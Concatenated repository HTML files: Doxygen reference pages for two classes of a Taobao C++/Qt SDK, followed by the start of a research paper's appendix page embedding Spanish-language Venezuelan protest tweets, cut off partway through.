<tr class="separator:a92f81ae42b484c9b2258b508e4023068 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a475fb70a1c5657f8a947c3d1e3f5262d inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a475fb70a1c5657f8a947c3d1e3f5262d">setTopForbiddenFields</a> (const QString &<a class="el" href="classTaoResponse.html#a4ff01826fe5b531e2427c7df23d4cc18">topForbiddenFields</a>)</td></tr>
<tr class="separator:a475fb70a1c5657f8a947c3d1e3f5262d inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pri-attribs"></a>
Private Attributes</h2></td></tr>
<tr class="memitem:a97ab3526ecbad40349bc3c1df35090d5"><td class="memItemLeft" align="right" valign="top">QDateTime </td><td class="memItemRight" valign="bottom"><a class="el" href="classWlbItemConsignmentDeleteResponse.html#a97ab3526ecbad40349bc3c1df35090d5">gmtModified</a></td></tr>
<tr class="memdesc:a97ab3526ecbad40349bc3c1df35090d5"><td class="mdescLeft"> </td><td class="mdescRight">修改时间 <a href="#a97ab3526ecbad40349bc3c1df35090d5">More...</a><br/></td></tr>
<tr class="separator:a97ab3526ecbad40349bc3c1df35090d5"><td class="memSeparator" colspan="2"> </td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="inherited"></a>
Additional Inherited Members</h2></td></tr>
<tr class="inherit_header pub_attribs_classTaoResponse"><td colspan="2" onclick="javascript:toggleInherit('pub_attribs_classTaoResponse')"><img src="closed.png" alt="-"/> Public Attributes inherited from <a class="el" href="classTaoResponse.html">TaoResponse</a></td></tr>
<tr class="memitem:a49272f40b67d4bbb9c63f3f7b1ae7386 inherit pub_attribs_classTaoResponse"><td class="memItemLeft" align="right" valign="top"><a class="el" href="classParser.html">Parser</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a49272f40b67d4bbb9c63f3f7b1ae7386">responseParser</a></td></tr>
<tr class="separator:a49272f40b67d4bbb9c63f3f7b1ae7386 inherit pub_attribs_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2>
<div class="textblock"><p>TOP RESPONSE API: 删除商品的代销关系 </p>
<dl class="section author"><dt>Author</dt><dd>sd44 <a href="#" onclick="location.href='mai'+'lto:'+'sd4'+'4s'+'dd4'+'4@'+'yea'+'h.'+'net'; return false;">sd44s<span style="display: none;">.nosp@m.</span>dd44<span style="display: none;">.nosp@m.</span>@yeah<span style="display: none;">.nosp@m.</span>.net</a> </dd></dl>
</div><h2 class="groupheader">Constructor & Destructor Documentation</h2>
<a class="anchor" id="a70d76b189dfb81d6540aeae340bb4e69"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">virtual WlbItemConsignmentDeleteResponse::~WlbItemConsignmentDeleteResponse </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td></td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">inline</span><span class="mlabel">virtual</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<h2 class="groupheader">Member Function Documentation</h2>
<a class="anchor" id="ab676a0ebc52f4e0c5a57a992a18df9c7"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">QDateTime WlbItemConsignmentDeleteResponse::getGmtModified </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td> const</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="acb6718473bd7d508390c41fa6038c531"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">void WlbItemConsignmentDeleteResponse::parseNormalResponse </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td></td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">virtual</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>Implements <a class="el" href="classTaoResponse.html#a726f09ea73fc5f7e1560c097d03b9838">TaoResponse</a>.</p>
</div>
</div>
<a class="anchor" id="a1b38ece6544b8c3861efa6bf4f0a7af7"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void WlbItemConsignmentDeleteResponse::setGmtModified </td>
<td>(</td>
<td class="paramtype">QDateTime </td>
<td class="paramname"><em>gmtModified</em></td><td>)</td>
<td></td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<h2 class="groupheader">Member Data Documentation</h2>
<a class="anchor" id="a97ab3526ecbad40349bc3c1df35090d5"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">QDateTime WlbItemConsignmentDeleteResponse::gmtModified</td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">private</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>修改时间 </p>
</div>
</div>
<hr/>The documentation for this class was generated from the following files:<ul>
<li>TaoApiCpp/response/<a class="el" href="WlbItemConsignmentDeleteResponse_8h_source.html">WlbItemConsignmentDeleteResponse.h</a></li>
<li>TaoApiCpp/response/<a class="el" href="WlbItemConsignmentDeleteResponse_8cpp.html">WlbItemConsignmentDeleteResponse.cpp</a></li>
</ul>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Sun Apr 14 2013 16:25:42 for Taobao Cpp/Qt SDK by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.3.1
</small></address>
</body>
</html>
|
doc/classRoutePromotionInfo.html | sd44/TaobaoCppQtSDK | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.3.1"/>
<title>Taobao Cpp/Qt SDK: RoutePromotionInfo Class Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Taobao Cpp/Qt SDK
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.3.1 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="inherits.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Pages</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-methods">Public Member Functions</a> |
<a href="#pri-attribs">Private Attributes</a> |
<a href="classRoutePromotionInfo-members.html">List of all members</a> </div>
<div class="headertitle">
<div class="title">RoutePromotionInfo Class Reference</div> </div>
</div><!--header-->
<div class="contents">
<p>线路的促销信息
<a href="classRoutePromotionInfo.html#details">More...</a></p>
<p><code>#include <<a class="el" href="RoutePromotionInfo_8h_source.html">RoutePromotionInfo.h</a>></code></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a>
Public Member Functions</h2></td></tr>
<tr class="memitem:ac938cac8f3dab79a02fbb7d62854ba5e"><td class="memItemLeft" align="right" valign="top">virtual </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#ac938cac8f3dab79a02fbb7d62854ba5e">~RoutePromotionInfo</a> ()</td></tr>
<tr class="separator:ac938cac8f3dab79a02fbb7d62854ba5e"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a349a4818fbdbefe4a57508f12f1ee515"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a349a4818fbdbefe4a57508f12f1ee515">getBasePromotionId</a> () const </td></tr>
<tr class="separator:a349a4818fbdbefe4a57508f12f1ee515"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:af81ae0725c4e4750b4c193d5985e07f2"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#af81ae0725c4e4750b4c193d5985e07f2">setBasePromotionId</a> (QString <a class="el" href="classRoutePromotionInfo.html#a6bf15e23bc21490530eb74774e6c1d95">basePromotionId</a>)</td></tr>
<tr class="separator:af81ae0725c4e4750b4c193d5985e07f2"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ab14c69264d6a9145b456871445083ee4"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#ab14c69264d6a9145b456871445083ee4">getPromotionDescription</a> () const </td></tr>
<tr class="separator:ab14c69264d6a9145b456871445083ee4"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a3828919f5e9251fdfd2c75cce31f4de2"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a3828919f5e9251fdfd2c75cce31f4de2">setPromotionDescription</a> (QString <a class="el" href="classRoutePromotionInfo.html#a82f46e5e90bb8d842415bbc30450d421">promotionDescription</a>)</td></tr>
<tr class="separator:a3828919f5e9251fdfd2c75cce31f4de2"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a8019bae0478254f7847ae96752d491cd"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a8019bae0478254f7847ae96752d491cd">getPromotionUrl</a> () const </td></tr>
<tr class="separator:a8019bae0478254f7847ae96752d491cd"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a3aee1e3fc35fb98871dece52faa21720"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a3aee1e3fc35fb98871dece52faa21720">setPromotionUrl</a> (QString <a class="el" href="classRoutePromotionInfo.html#a3294ce5f87484955be4a341bdbfb265f">promotionUrl</a>)</td></tr>
<tr class="separator:a3aee1e3fc35fb98871dece52faa21720"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a5776d8569ef46cf7277b3b4929e4375d"><td class="memItemLeft" align="right" valign="top">bool </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a5776d8569ef46cf7277b3b4929e4375d">getUnbasePromotion</a> () const </td></tr>
<tr class="separator:a5776d8569ef46cf7277b3b4929e4375d"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a9c3de3b53fae352d7aae51b5d56c484d"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a9c3de3b53fae352d7aae51b5d56c484d">setUnbasePromotion</a> (bool <a class="el" href="classRoutePromotionInfo.html#a895d871c0e8ba45674571ef3128ac961">unbasePromotion</a>)</td></tr>
<tr class="separator:a9c3de3b53fae352d7aae51b5d56c484d"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a6fe8169e8d21db4742f462f1462a3670"><td class="memItemLeft" align="right" valign="top">virtual void </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a6fe8169e8d21db4742f462f1462a3670">parseResponse</a> ()</td></tr>
<tr class="separator:a6fe8169e8d21db4742f462f1462a3670"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="inherit_header pub_methods_classTaoDomain"><td colspan="2" onclick="javascript:toggleInherit('pub_methods_classTaoDomain')"><img src="closed.png" alt="-"/> Public Member Functions inherited from <a class="el" href="classTaoDomain.html">TaoDomain</a></td></tr>
<tr class="memitem:aebdf128b091f01ebf8fb9d54a6aed808 inherit pub_methods_classTaoDomain"><td class="memItemLeft" align="right" valign="top"> </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoDomain.html#aebdf128b091f01ebf8fb9d54a6aed808">TaoDomain</a> ()</td></tr>
<tr class="separator:aebdf128b091f01ebf8fb9d54a6aed808 inherit pub_methods_classTaoDomain"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a35c282269ada3a7e71798a85df4fb4f9 inherit pub_methods_classTaoDomain"><td class="memItemLeft" align="right" valign="top">virtual </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoDomain.html#a35c282269ada3a7e71798a85df4fb4f9">~TaoDomain</a> ()</td></tr>
<tr class="separator:a35c282269ada3a7e71798a85df4fb4f9 inherit pub_methods_classTaoDomain"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a03306cb36ac8333211a49d31a836b032 inherit pub_methods_classTaoDomain"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoDomain.html#a03306cb36ac8333211a49d31a836b032">setParser</a> (<a class="el" href="classParser.html">Parser</a> *parser)</td></tr>
<tr class="separator:a03306cb36ac8333211a49d31a836b032 inherit pub_methods_classTaoDomain"><td class="memSeparator" colspan="2"> </td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pri-attribs"></a>
Private Attributes</h2></td></tr>
<tr class="memitem:a6bf15e23bc21490530eb74774e6c1d95"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a6bf15e23bc21490530eb74774e6c1d95">basePromotionId</a></td></tr>
<tr class="memdesc:a6bf15e23bc21490530eb74774e6c1d95"><td class="mdescLeft"> </td><td class="mdescRight">线路基本促销的id <a href="#a6bf15e23bc21490530eb74774e6c1d95">More...</a><br/></td></tr>
<tr class="separator:a6bf15e23bc21490530eb74774e6c1d95"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a82f46e5e90bb8d842415bbc30450d421"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a82f46e5e90bb8d842415bbc30450d421">promotionDescription</a></td></tr>
<tr class="memdesc:a82f46e5e90bb8d842415bbc30450d421"><td class="mdescLeft"> </td><td class="mdescRight">促销的描述 <a href="#a82f46e5e90bb8d842415bbc30450d421">More...</a><br/></td></tr>
<tr class="separator:a82f46e5e90bb8d842415bbc30450d421"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a3294ce5f87484955be4a341bdbfb265f"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a3294ce5f87484955be4a341bdbfb265f">promotionUrl</a></td></tr>
<tr class="memdesc:a3294ce5f87484955be4a341bdbfb265f"><td class="mdescLeft"> </td><td class="mdescRight">具体活动详情页面链接 <a href="#a3294ce5f87484955be4a341bdbfb265f">More...</a><br/></td></tr>
<tr class="separator:a3294ce5f87484955be4a341bdbfb265f"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a895d871c0e8ba45674571ef3128ac961"><td class="memItemLeft" align="right" valign="top">bool </td><td class="memItemRight" valign="bottom"><a class="el" href="classRoutePromotionInfo.html#a895d871c0e8ba45674571ef3128ac961">unbasePromotion</a></td></tr>
<tr class="memdesc:a895d871c0e8ba45674571ef3128ac961"><td class="mdescLeft"> </td><td class="mdescRight">是否包含非基础促销 <a href="#a895d871c0e8ba45674571ef3128ac961">More...</a><br/></td></tr>
<tr class="separator:a895d871c0e8ba45674571ef3128ac961"><td class="memSeparator" colspan="2"> </td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="inherited"></a>
Additional Inherited Members</h2></td></tr>
<tr class="inherit_header pub_attribs_classTaoDomain"><td colspan="2" onclick="javascript:toggleInherit('pub_attribs_classTaoDomain')"><img src="closed.png" alt="-"/> Public Attributes inherited from <a class="el" href="classTaoDomain.html">TaoDomain</a></td></tr>
<tr class="memitem:ad34bf26981ee22bb6d77619e4c9dce91 inherit pub_attribs_classTaoDomain"><td class="memItemLeft" align="right" valign="top"><a class="el" href="classParser.html">Parser</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoDomain.html#ad34bf26981ee22bb6d77619e4c9dce91">responseParser</a></td></tr>
<tr class="separator:ad34bf26981ee22bb6d77619e4c9dce91 inherit pub_attribs_classTaoDomain"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2>
<div class="textblock"><p>线路的促销信息 </p>
<dl class="section author"><dt>Author</dt><dd>sd44 <a href="#" onclick="location.href='mai'+'lto:'+'sd4'+'4s'+'dd4'+'4@'+'yea'+'h.'+'net'; return false;">sd44s<span style="display: none;">.nosp@m.</span>dd44<span style="display: none;">.nosp@m.</span>@yeah<span style="display: none;">.nosp@m.</span>.net</a> </dd></dl>
</div><h2 class="groupheader">Constructor & Destructor Documentation</h2>
<a class="anchor" id="ac938cac8f3dab79a02fbb7d62854ba5e"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">virtual RoutePromotionInfo::~RoutePromotionInfo </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td></td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">inline</span><span class="mlabel">virtual</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<h2 class="groupheader">Member Function Documentation</h2>
<a class="anchor" id="a349a4818fbdbefe4a57508f12f1ee515"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">QString RoutePromotionInfo::getBasePromotionId </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td> const</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="ab14c69264d6a9145b456871445083ee4"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">QString RoutePromotionInfo::getPromotionDescription </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td> const</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="a8019bae0478254f7847ae96752d491cd"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">QString RoutePromotionInfo::getPromotionUrl </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td> const</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="a5776d8569ef46cf7277b3b4929e4375d"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">bool RoutePromotionInfo::getUnbasePromotion </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td> const</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="a6fe8169e8d21db4742f462f1462a3670"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">void RoutePromotionInfo::parseResponse </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td></td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">virtual</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>Implements <a class="el" href="classTaoDomain.html#a5d8565d97558794245a2d33220fe90ca">TaoDomain</a>.</p>
</div>
</div>
<a class="anchor" id="af81ae0725c4e4750b4c193d5985e07f2"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void RoutePromotionInfo::setBasePromotionId </td>
<td>(</td>
<td class="paramtype">QString </td>
<td class="paramname"><em>basePromotionId</em></td><td>)</td>
<td></td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="a3828919f5e9251fdfd2c75cce31f4de2"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void RoutePromotionInfo::setPromotionDescription </td>
<td>(</td>
<td class="paramtype">QString </td>
<td class="paramname"><em>promotionDescription</em></td><td>)</td>
<td></td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="a3aee1e3fc35fb98871dece52faa21720"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void RoutePromotionInfo::setPromotionUrl </td>
<td>(</td>
<td class="paramtype">QString </td>
<td class="paramname"><em>promotionUrl</em></td><td>)</td>
<td></td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="a9c3de3b53fae352d7aae51b5d56c484d"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void RoutePromotionInfo::setUnbasePromotion </td>
<td>(</td>
<td class="paramtype">bool </td>
<td class="paramname"><em>unbasePromotion</em></td><td>)</td>
<td></td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<h2 class="groupheader">Member Data Documentation</h2>
<a class="anchor" id="a6bf15e23bc21490530eb74774e6c1d95"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">QString RoutePromotionInfo::basePromotionId</td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">private</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>线路基本促销的id </p>
</div>
</div>
<a class="anchor" id="a82f46e5e90bb8d842415bbc30450d421"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">QString RoutePromotionInfo::promotionDescription</td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">private</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>促销的描述 </p>
</div>
</div>
<a class="anchor" id="a3294ce5f87484955be4a341bdbfb265f"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">QString RoutePromotionInfo::promotionUrl</td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">private</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>具体活动详情页面链接 </p>
</div>
</div>
<a class="anchor" id="a895d871c0e8ba45674571ef3128ac961"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">bool RoutePromotionInfo::unbasePromotion</td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">private</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>是否包含非基础促销 </p>
</div>
</div>
<hr/>The documentation for this class was generated from the following files:<ul>
<li>TaoApiCpp/domain/<a class="el" href="RoutePromotionInfo_8h_source.html">RoutePromotionInfo.h</a></li>
<li>TaoApiCpp/domain/<a class="el" href="RoutePromotionInfo_8cpp.html">RoutePromotionInfo.cpp</a></li>
</ul>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Sun Apr 14 2013 16:25:40 for Taobao Cpp/Qt SDK by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.3.1
</small></address>
</body>
</html>
|
index.html | triestpa/Venezuela-Twitter-Appendix | <html>
<head>
<title>
Appendix
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div id="title" style="text-align: center;">
<h1>
Appendix A: Tweets
</h1>
</div>
<h3 style="text-align: center; font-size: 20px;"> Appendix to "Anti-Chavistas on Twitter: Flying in the Face of Venezuela's Socialist Revolution" <br> by Nathan Forman and Patrick Triest.</h3>
<h3 style="text-align: center; font-size: 20px; margin-bottom: 30px;"> Download paper <a href='docs/venezuela-twitter-revolution.pdf'>here</a></h3>
<h3 style="text-align: center; font-size: 20px; margin-bottom: 30px;"> See our full-screen Twitter presentation <a href='presentation.html'>here</a></h3>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A1.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
<a href="https://twitter.com/tiafatimasaleh">@tiafatimasaleh</a> <a href="https://twitter.com/AguerridaMujer">@AguerridaMujer</a> <a href="https://twitter.com/WRadioColombia">@WRadioColombia</a> <a href="https://twitter.com/search?q=%2331M&src=hash">#31M</a> Estudiantes d Bachillerato <a href="https://twitter.com/search?q=%23YoLuchoPorTi&src=hash">#YoLuchoPorTi</a> <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a> <a href="http://t.co/N0utgQXzCs">http://t.co/N0utgQXzCs</a>
</p>— Patricia Rincón (@prdemocracia) <a href="https://twitter.com/prdemocracia/statuses/451058138889084928">April 1, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A2.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
(+Fotos) Estudiantes marcharon descalzos por “sufrimiento” de Venezuela <a href="https://twitter.com/search?q=%23venezuela&src=hash">#venezuela</a> <a href="https://twitter.com/search?q=%23dictadura&src=hash">#dictadura</a> <a href="http://t.co/mpdGeJGyx2">pic.twitter.com/mpdGeJGyx2</a>
</p>— Dictadura Venezuela (@DictaduraVe) <a href="https://twitter.com/DictaduraVe/statuses/456921039134797824">April 17, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A3.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
Madres y Padres marcharon en Valencia en contra de la nueva ley de educación 23A <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a> <a href="http://t.co/IXUJgpVw59">pic.twitter.com/IXUJgpVw59</a>
</p>— Valencia NORTE-SUR (@ValenciaSeria) <a href="https://twitter.com/ValenciaSeria/statuses/459149228997373952">April 24, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A4.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
Lucha por 2 partos la democracia de su hijo y la libertad de su pais <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a> <a href="https://twitter.com/search?q=%2331M&src=hash">#31M</a> <a href="https://twitter.com/search?q=%23LaMUDaMurioVivaLaResistencia&src=hash">#LaMUDaMurioVivaLaResistencia</a> <a href="http://t.co/oV3dukK9cT">pic.twitter.com/oV3dukK9cT</a>
